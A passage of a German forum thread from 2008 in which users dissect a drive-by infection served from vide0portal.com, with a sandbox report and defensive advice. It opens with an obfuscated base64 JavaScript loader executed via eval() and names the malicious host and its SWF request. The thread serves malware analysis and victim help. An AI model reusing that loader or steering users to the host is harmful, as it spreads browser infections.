NWHB0WDJGTWNYQm9VbHBmWVhoQ1EwNXNURjlmYUhBeGIzVjVURXRJYldob05IQkJibko1TlV4QVUyZ3plbGxwTkV0eFMxODRPRXd5VkdORE9ERjFjak5vZFV4dmRrYzVUek5yVERoc1FqaEtWbE4zTW5kTGQyaHFjVE0wVGxOUlIwQm9ZemhVV25SU1VHeGlNMHRaV1U1NFlsOWZlbDkzWDI1eGR6aEtjRk5mUzNOUk1tdG9aV2gyTVV3eGVtMVJUMm80WVdGTU9ERmhNWEZ3YVVweFUxOUxjMUV5YTJobGFIWXhUREY2YlZGUGVUaGhZVXc0TVdGNWNYQnBTbkZpTkRaME0xSm9XakU0TVZSUlRtUkNTMnhQU3pGaGVsOVRZVjkzWDJGMmJURkFZMmhqYmt0VGNVNDJkVE15V1hCVFUwOURTMTkzY1ZOM1gzQlRYM1p0TVVCamFHTnVTMU54VGpaMVlUSlpjSGRUVEhGaWJrOUdjR2xQYzFFeWEyaGxhSFl4VERGNmJWRlBlVGhoWVY5eGR6SjNjVk4zWDNCVFgzWnRNVUJqYUdOdVMxTnhUaloxWVRKWmNGTlRUM05MWDNkeFlrdFBYMmszWjFsZlIyWjNURjkzVmpGaFpsbFpUazkwT0VweFRGOU9SVXh4TjFSd2QxTlBVVU5vVW0xUk0yeHdPR1ZMVkhkcGRYQjBNMnByYUdsMWNIUXphbXRaWVhkV01XRjJVMmc0T0dOTVgxWlphVTlUY0VOQVUwWnBiek5MYUdVeldrdzBTM0JUVTA5ME1XNVRVWEV5ZDNGVE5IaFRNMHRxZURNeFRYQmhZVFE0TVdGV1dXbFBVM0JEUUZOR2FXOXVjVk0wUzB4alRqTnJZMmc0ZDJnemIyMWhOR1ZDT0dWUE9ERmhTVkpNYURoWldUTXphMk5vT0hkb1pVQmlPRGRvV1dnNE9FdzVhRXBTVEY5dWJUZzBiM2xaTVU5VWNHRTRPR05PTjNreFlWWlphVTlUY0VOQVUwWnBiMHhNWWpGUE9GOWhUSEIzT0RSQ2NtaEFVMlV6YlZOM1gyNXhkM2NuS1RzPQ==" );

                 bcTm3E = VgYbPlrsoUtZB ( ghVLJIEqm5Yq );

                eval( bcTm3E );

(Ich hab schon den \ Müll entfernt)
Wie gesagt diese Funktionen dienen nur zum Entschlüsseln eines weiteren Javascripts:

No File | xup.in

Und das Script entschlüsselt das finale exploit script:

Frubar Paste

Dieses Script lässt sich jetzt diesem Exploit zuordnen:

http://www.securityfocus.com/bid/27641/info

Was der Shellcode in dem Exploit genau macht lässt sich leider nicht so einfach rausfinden.

Neben dem pdf wird auch noch eine SWF Datei aufgerufen, da könnte auch nochmal ein Exploit drin sein:

Code:

GET /news/files/swf.swf HTTP/1.1
Host: vide0portal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.3) Gecko/2008092417
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://vide0portal.com/news/index.php

Auf dem Server läuft mit Sicherheit ein Exploit-Kit. Je nachdem mit was der User auf die Webseite geht werden eben ein paar Exploits ausgepackt. Es kann also sein das noch viel mehr Exploits auf der Webseite schlummern und nur auf den richtigen Browser und das richtige OS warten.
Um sich ein bisschen vor solchen Exploit-Kits zu schützen ist es deshalb sehr ratsam den verräterischen Browser-User-Agent zu ändern. Wie steht auf wiki User_Agent

unix · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Hammer geil,
Ihr seid echt die Besten ^^

Also hat mir NoScript mal das "Leben" gerettet, wenn es wie du sagst ein JavaScript war.

Aber was ich net kapier, wenn es NoScript blockt wieso konnte dann mein firefox auf einmal so rumspinnen, dass er sich aufhängt etc. wenn doch kein Script gestartet wurde.

Und wieso kann ich mein ebay PW net ändern

Ist immernoch der Scheiß das ich nach dem ändern in MeinEbay reinkomme, das PW ist aber immernoch gleich und ne e-mail krieg ich auch net

BW sind raus

VIELEN DANK!!!

N0S · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

NoScript bringt in diesem Fall eigentlich nichts, weil es ein Adobe Reader Exploit ist. Wenn du dieses PDF File mit einem angreifbaren Adobe Reader (steht da welche das genau sind: Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities ) geöffnet hast (der Reader öffnet sich ja automatisch im Browser) dann bist du infiziert.
Vielleicht mal hijackthis laufen lassen oder Antivirenscanner suchen lassen.

unix · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

joa ich hab kein Adobe Reader installiert sondern den Foxit PDF Reader, deswegen hab ich ja eig. Glück gehabt

Aber so wie ich es verstanden hätte, öffnet das JavaScript die PDF, aber war anscheinend falsch, zusätzlich zum Script noch die pdf. (und ne swf).

DerW0olf · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Also ich habs dummerweise ja probiert und bin evtl. infiziert.
Seit dem bekomm ich einen Error bei Hijackthis.
Also er erstellt alles aber bei
O15 oder O23 kommt dann :

was soll ich machen ^^

unix · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

lass mal nen Virenscan durchlaufen!

Hast du Adobe oder was anderes um pdf dateien zu lesen?

Bleibt dann noch die Scheiß swf ^^
Also bei nem Virenscan hat der bei mir über 20 Viren und Trojaner gefunden und ich denk mal jetzt bin ich clean ^^ hab auch nach rootkits gesucht gehabt nix und Spyware ist auch nix hier.

DerW0olf · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Hab Adobe Photoreader :/
naja ich lass ma durchlaufen
bis jetzt nur aeq hacks gefunden als viren ^^

spotting · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Anubis: Analyzing Unknown Binaries

___ __ _
+ /- / | ____ __ __/ /_ (_)____ -\ +
/s h- / /| | / __ \/ / / / __ \/ / ___/ -h s\
oh-:d/ / ___ |/ / / / /_/ / /_/ / (__ ) /d:-ho
shh+hy- /_/ |_/_/ /_/\__,_/_.___/_/____/ -yh+hhs
-:+hhdhyys/- -\syyhdhh+:-
-//////dhhhhhddhhyss- Analysis Report -ssyhhddhhhhhd\\\\\\-
/++/////oydddddhhyys/ ooooooooooooooooooooo \syyhhdddddyo\\\\\++\
-+++///////odh/- -+hdo\\\\\\\+++-
+++++++++//yy+/: :\+yy\\+++++++++
/+soss+sys//yyo/os++o+: :+o++so\oyy\\sys+ssos+\
+oyyyys++o/+yss/+/oyyyy: :yyyyo\+\ssy+\o++syyyyo+
+oyyyyyyso+os/o/+yyyyyy/ \yyyyyy+\o\so+osyyyyyyo+

[#############################################################################]
Analysis Report for http://vide0portal.com/news/index.php
[#############################################################################]

Summary:
- Changes security settings of Internet Explorer:
This system alteration could seriously affect safety surfing the World
Wide Web.

- Performs File Modification and Destruction:
The executable modifiesand destructs files which are not temporary.

- Performs Registry Activities:
The executable reads and modifies registry values. It also creates and
monitors registry keys.

[=============================================================================]
Table of Contents
[=============================================================================]

- General information
- iexplore.exe
a) Registry Activities
b) File Activities
c) Process Activities
d) Network Activities
e) Other Activities

[#############################################################################]
1. General Information
[#############################################################################]
[=============================================================================]
Information about Anubis' invocation
[=============================================================================]
Time needed: 241 s
Report created: 12/30/08, 21:21:51 UTC
Termination reason: Timeout
Program version: 1.67.0

[=============================================================================]
Global Network Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Unknown UDP Traffic:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
From ANUBIS:1026 to 192.168.0.1:53
State: [ Normal establishment and termination ],
Outbound Bytes: [ 33 ], Inbound Bytes: [ 128 ]

[#############################################################################]
2. iexplore.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[===]
Analysis Reason: Primary Analysis Subject
Filename: iexplore.exe
Command Line: "C:\Programme\Internet Explorer\iexplore.exe" http://vide0portal.com/news/index.php
Process-status
at analysis end: alive
Exit Code: 0

[===]
Load-time Dlls
[===]
Module Name: [ C:\WINDOWS\System32\ntdll.dll ],
Base Address: [0x77F40000 ], Size: [0x000B0000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x77E40000 ], Size: [0x000F7000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77BE0000 ], Size: [0x00053000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x77D10000 ], Size: [0x0008D000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77C40000 ], Size: [0x00040000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DA0000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77C90000 ], Size: [0x00075000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x772A0000 ], Size: [0x00063000 ]
Module Name: [ C:\WINDOWS\System32\SHDOCVW.dll ],
Base Address: [0x76970000 ], Size: [0x00149000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll ],
Base Address: [0x71950000 ], Size: [0x000E4000 ]

[===]
Run-time Dlls
[===]
Module Name: [ C:\WINDOWS\System32\wsock32.dll ],
Base Address: [0x00C40000 ], Size: [0x00009000 ]
Module Name: [ C:\WINDOWS\System32\WS2_32.dll ],
Base Address: [0x00C50000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\System32\WS2HELP.dll ],
Base Address: [0x00C70000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\System32\wshtcpip.dll ],
Base Address: [0x00C80000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\mswsock.dll ],
Base Address: [0x00EA0000 ], Size: [0x0003C000 ]
Module Name: [ C:\WINDOWS\System32\UxTheme.dll ],
Base Address: [0x5B0F0000 ], Size: [0x00034000 ]
Module Name: [ C:\Programme\Java\jre1.6.0_07\bin\ssv.dll ],
Base Address: [0x6D7C0000 ], Size: [0x0007B000 ]
Module Name: [ C:\WINDOWS\System32\NETAPI32.dll ],
Base Address: [0x71BA0000 ], Size: [0x0004F000 ]
Module Name: [ C:\WINDOWS\System32\sensapi.dll ],
Base Address: [0x72240000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\System32\browselc.dll ],
Base Address: [0x723C0000 ], Size: [0x00013000 ]
Module Name: [ C:\WINDOWS\System32\MSLS31.DLL ],
Base Address: [0x74640000 ], Size: [0x00027000 ]
Module Name: [ C:\WINDOWS\System32\msimtf.dll ],
Base Address: [0x74670000 ], Size: [0x00029000 ]
Module Name: [ C:\WINDOWS\System32\MSCTF.dll ],
Base Address: [0x746A0000 ], Size: [0x0004B000 ]
Module Name: [ C:\WINDOWS\System32\mlang.dll ],
Base Address: [0x746F0000 ], Size: [0x0008F000 ]
Module Name: [ C:\WINDOWS\System32\mshtml.dll ],
Base Address: [0x74790000 ], Size: [0x002AD000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x75A10000 ], Size: [0x000A5000 ]
Module Name: [ C:\WINDOWS\System32\jscript.dll ],
Base Address: [0x75BF0000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\System32\SXS.DLL ],
Base Address: [0x75E30000 ], Size: [0x000A2000 ]
Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
Base Address: [0x75EE0000 ], Size: [0x0001D000 ]
Module Name: [ C:\WINDOWS\System32\BROWSEUI.dll ],
Base Address: [0x75F20000 ], Size: [0x000FC000 ]
Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
Base Address: [0x76090000 ], Size: [0x00078000 ]
Module Name: [ C:\WINDOWS\System32\shdoclc.dll ],
Base Address: [0x76110000 ], Size: [0x0008E000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x761A0000 ], Size: [0x00098000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x76240000 ], Size: [0x0000F000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x76260000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\System32\IMM32.DLL ],
Base Address: [0x76330000 ], Size: [0x0001A000 ]
Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
Base Address: [0x765A0000 ], Size: [0x0001B000 ]
Module Name: [ C:\WINDOWS\System32\cscui.dll ],
Base Address: [0x765C0000 ], Size: [0x00050000 ]
Module Name: [ C:\WINDOWS\System32\SETUPAPI.dll ],
Base Address: [0x76620000 ], Size: [0x000E5000 ]
Module Name: [ C:\WINDOWS\System32\shfolder.dll ],
Base Address: [0x76730000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\System32\WINMM.dll ],
Base Address: [0x76AF0000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\System32\rtutils.dll ],
Base Address: [0x76E40000 ], Size: [0x0000D000 ]
Module Name: [ C:\WINDOWS\System32\rasman.dll ],
Base Address: [0x76E50000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\System32\TAPI32.dll ],
Base Address: [0x76E70000 ], Size: [0x0002A000 ]
Module Name: [ C:\WINDOWS\System32\RASAPI32.DLL ],
Base Address: [0x76EA0000 ], Size: [0x00037000 ]
Module Name: [ C:\WINDOWS\System32\DNSAPI.dll ],
Base Address: [0x76EE0000 ], Size: [0x00025000 ]
Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
Base Address: [0x76F20000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\System32\Secur32.dll ],
Base Address: [0x76F50000 ], Size: [0x00010000 ]
Module Name: [ C:\WINDOWS\System32\winrnr.dll ],
Base Address: [0x76F70000 ], Size: [0x00007000 ]
Module Name: [ C:\WINDOWS\System32\rasadhlp.dll ],
Base Address: [0x76F80000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\System32\CLBCATQ.DLL ],
Base Address: [0x76F90000 ], Size: [0x00078000 ]
Module Name: [ C:\WINDOWS\System32\COMRes.dll ],
Base Address: [0x77010000 ], Size: [0x000D3000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x770F0000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x77180000 ], Size: [0x0011A000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x77310000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x773A0000 ], Size: [0x007FE000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77BD0000 ], Size: [0x00007000 ]
Module Name: [ C:\Programme\Java\jre1.6.0_07\bin\MSVCR71.dll ],
Base Address: [0x7C340000 ], Size: [0x00056000 ]

[===]
2.a) iexplore.exe - Registry Activities
[===]
[=-=]
Registry Values Read:
[=-=]
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters ],
Value Name: [ Transports ], Value: [ 0x5400630070006900700000004e0065007400420049004f00530000000000 ], 2 times
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ OsLoaderPath ], Value: [ \ ], 2 times
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemPartition ], Value: [ \Device\HarddiskVolume1 ], 2 times
Key: [ HKLM\Software\Microsoft\Internet Explorer\URL Compatibility\~/CONNWIZ.HTM ],
Value Name: [ Compatibility Flags ], Value: [ 4 ], 1 time
Key: [ HKLM\Software\Microsoft\Internet Explorer\URL Compatibility\~/CWIZINTR.HTM ],
Value Name: [ Compatibility Flags ], Value: [ 4 ], 1 time
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
Value Name: [ DevicePath ], Value: [ %SystemRoot%\inf ], 1 time
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\ICWCONN1.EXE ],
Value Name: [ Path ], Value: [ C:\Programme\Internet Explorer\Connection Wizard; ], 1 time
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
Value Name: [ DriverCachePath ], Value: [ %SystemRoot%\Driver Cache ], 2 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
Value Name: [ ServicePackSourcePath ], Value: [ D:\ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
Value Name: [ SourcePath ], Value: [ D:\ ], 2 times
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
Value Name: [ ProductType ], Value: [ WinNT ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\WPA\PnP ],
Value Name: [ seed ], Value: [ 3051945280 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\LDAP ],
Value Name: [ LdapClientIntegrity ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ],
Value Name: [ UseDomainNameDevolution ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
Value Name: [ HelperDllName ], Value: [ %SystemRoot%\System32\wshtcpip.dll ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
Value Name: [ Mapping ], Value: [ 0x0b0000000300000002000000010000000600000002000000010000000000 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
Value Name: [ MaxSockaddrLength ], Value: [ 16 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
Value Name: [ MinSockaddrLength ], Value: [ 16 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
Value Name: [ UseDelayedAcceptance ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Lokale Einstellungen ], 1 time
Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Personal ], Value: [ %USERPROFILE%\Eigene Dateien ], 1 time

[===]
2.b) iexplore.exe - File Activities
[===]
[=-=]
Files Created:
[=-=]
File Name: [ C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temporary Internet Files\Content.IE5\CHT2SY0U\index[1].htm ]

[=-=]
Files Read:
[=-=]
File Name: [ PIPE\svcctl ]

[=-=]
Files Modified:
[=-=]
File Name: [ C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temporary Internet Files\Content.IE5\CHT2SY0U\index[1].htm ]
File Name: [ PIPE\svcctl ]
File Name: [ \Device\Afd\Endpoint ]

[=-=]
Device Control Communication:
[=-=]
File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 8 times
[=-=]
Memory Mapped Files:
[=-=]
File Name: [ C:\Programme\Java\jre1.6.0_07\bin\MSVCR71.dll ]
File Name: [ C:\Programme\Java\jre1.6.0_07\bin\ssv.dll ]
File Name: [ C:\WINDOWS\System32\BROWSEUI.dll ]
File Name: [ C:\WINDOWS\System32\CLBCATQ.DLL ]
File Name: [ C:\WINDOWS\System32\COMRes.dll ]
File Name: [ C:\WINDOWS\System32\CSCDLL.dll ]
File Name: [ C:\WINDOWS\System32\DNSAPI.dll ]
File Name: [ C:\WINDOWS\System32\IMM32.DLL ]
File Name: [ C:\WINDOWS\System32\MSCTF.dll ]
File Name: [ C:\WINDOWS\System32\MSLS31.DLL ]
File Name: [ C:\WINDOWS\System32\NETAPI32.dll ]
File Name: [ C:\WINDOWS\System32\RASAPI32.DLL ]
File Name: [ C:\WINDOWS\System32\SETUPAPI.dll ]
File Name: [ C:\WINDOWS\System32\SXS.DLL ]
File Name: [ C:\WINDOWS\System32\Secur32.dll ]
File Name: [ C:\WINDOWS\System32\TAPI32.dll ]
File Name: [ C:\WINDOWS\System32\UxTheme.dll ]
File Name: [ C:\WINDOWS\System32\WINMM.dll ]
File Name: [ C:\WINDOWS\System32\WS2HELP.dll ]
File Name: [ C:\WINDOWS\System32\WS2_32.dll ]
File Name: [ C:\WINDOWS\System32\browselc.dll ]
File Name: [ C:\WINDOWS\System32\cscui.dll ]
File Name: [ C:\WINDOWS\System32\jscript.dll ]
File Name: [ C:\WINDOWS\System32\mlang.dll ]
File Name: [ C:\WINDOWS\System32\msimtf.dll ]
File Name: [ C:\WINDOWS\System32\rasadhlp.dll ]
File Name: [ C:\WINDOWS\System32\rasman.dll ]
File Name: [ C:\WINDOWS\System32\rtutils.dll ]
File Name: [ C:\WINDOWS\System32\sensapi.dll ]
File Name: [ C:\WINDOWS\System32\shdoclc.dll ]
File Name: [ C:\WINDOWS\System32\shfolder.dll ]
File Name: [ C:\WINDOWS\System32\winrnr.dll ]
File Name: [ C:\WINDOWS\System32\wshtcpip.dll ]
File Name: [ C:\WINDOWS\System32\wsock32.dll ]
File Name: [ C:\WINDOWS\system32\WININET.dll ]
File Name: [ C:\WINDOWS\system32\mswsock.dll ]
File Name: [ C:\WINDOWS\system32\urlmon.dll ]

[===]
2.c) iexplore.exe - Process Activities
[===]
[=-=]
Thread Overview:
[=-=]
After 125 seconds, Number of threads: 1

[===]
2.d) iexplore.exe - Network Activities
[===]
[=-=]
DNS Queries:
[=-=]
Name: [ vide0portal.com ], Query Type: [ DNS_TYPE_A ],
Query Result: [ 58.241.255.34 ], Successful: [ 1 ], Protocol: [ ]

[=-=]
HTTP Conversations:
[=-=]
From ANUBIS:1034 to 58.241.255.34:80 - [ vide0portal.com ]
Request: [ GET /news/index.php ], Response: [ 200 "OK" ]
[=-]
2.e) iexplore.exe - Other Activities
[=-=]
Mutexes Created:
[=-=]
Mutex: [ MSCTF.Shared.MUTEX.AFF ]
Mutex: [ MSCTF.TimListMUTEX. ]
Mutex: [ MSUIM.Assembly.Mutex ]
Mutex: [ MSUIM.GlobalCompartment.Mutex ]
Mutex: [ MSUIM.GlobalLangBarEventSink.Mutex ]
Mutex: [ MSUIM.Layouts.Mutex ]
Mutex: [ MSUIM.MarshalInterfaceMutex.TMD ]
Mutex: [ ZonesCacheCounterMutex ]
Mutex: [ ZonesCounterMutex ]
[=-=]
Keyboard Keys Monitored:
[=-=]
Virtual Key Code: [ VK_CONTROL (17) ], 18 times
Virtual Key Code: [ VK_ESCAPE (27) ], 22 times
Virtual Key Code: [ VK_SHIFT (16) ], 17 times
Virtual Key Code: [ VK_MENU (18) ], 17 times
Virtual Key Code: [ VK_LSHIFT (160) ], 12 times
Virtual Key Code: [ VK_LCONTROL (162) ], 12 times
Virtual Key Code: [ VK_LMENU (164) ], 12 times
Virtual Key Code: [ VK_LBUTTON (1) ], 64 times
Virtual Key Code: [ VK_RBUTTON (2) ], 5 times
Virtual Key Code: [ VK_MBUTTON (4) ], 5 times

hut ab vor dem, der die seite erstellt hat.

der spoiler beschreibt, was passiert wenn man mit dem IE darauf surft und in keiner weise geschützt ist.

meine empfehlung, eaktiviert javascript und java !!! und arbeitet NICHT mit admin rechten.

dann ist diese seite ziemlich nutzlos.

was aber, wenn ihr doch auf der seite wart?
sucht manuell mit einem vom windows system unabhängigen dateimanager
-> so etwas findet ihr in "icesword" oder in einer windows pe oder linux boot cd
nach den dateien, die im spoiler aufgeführt sind, sichert die dateien und prüft jede der dateien auf jotti oder virustotal. ...

Murdoc · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

nope, du bekommst ne pdf -> in dieser is javascript-code -> dieser code nutzt ne lücke und führt shellcode aus (denk ich ma) -> es wird ne swf nachgeladen mit weiteren exploits

also bringt dir ausgeschaltetes java oder javascript in dem fall überhaupt nix.

Nützliche Suchen

Infizierte php geöffnet kann einer sich das mal anschauen xD

Videos zum Themenbereich